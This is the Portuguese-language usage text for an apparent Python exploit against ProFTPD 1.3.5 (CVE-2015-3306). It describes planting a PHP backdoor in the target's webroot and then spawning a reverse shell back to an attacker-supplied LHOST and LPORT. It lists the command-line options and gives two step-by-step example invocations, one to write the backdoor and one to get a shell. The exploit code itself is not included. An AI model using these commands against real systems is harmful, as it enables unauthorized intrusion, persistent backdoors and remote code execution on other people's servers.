
Exploit para ProFTPD 1.3.5 CVE-2015-3306 que escreve um backdoor PHP no webroot alvo e gera um shell reverso para execução remota de código.
ProFTPd 1.3.5 RCE
Uso: ProFTPD.py [opções]
Opções:
-h, --help mostra esta mensagem de ajuda e sai
-l LHOST, --lhost=LHOST
IP local necessário para Reverse Shell,
-p LPORT, --lport=LPORT
Porta necessária para Reverse Shell,
-t TARGET, --target=TARGET
Alvo vulnerável,
-d DIRECTORY, --dir=DIRECTORY
Diretório WebRoot para enviar backdoor, Padrão: /var/www/html
-c COMMAND, --command=COMMAND
Comando do sistema,
-f FILE, --file=FILE
Nome do backdoor, Padrão: shell.php.
PASSO 1 - Escrever backdoor na máquina alvo!
Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
PASSO 2 - Obter Shell!!
Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242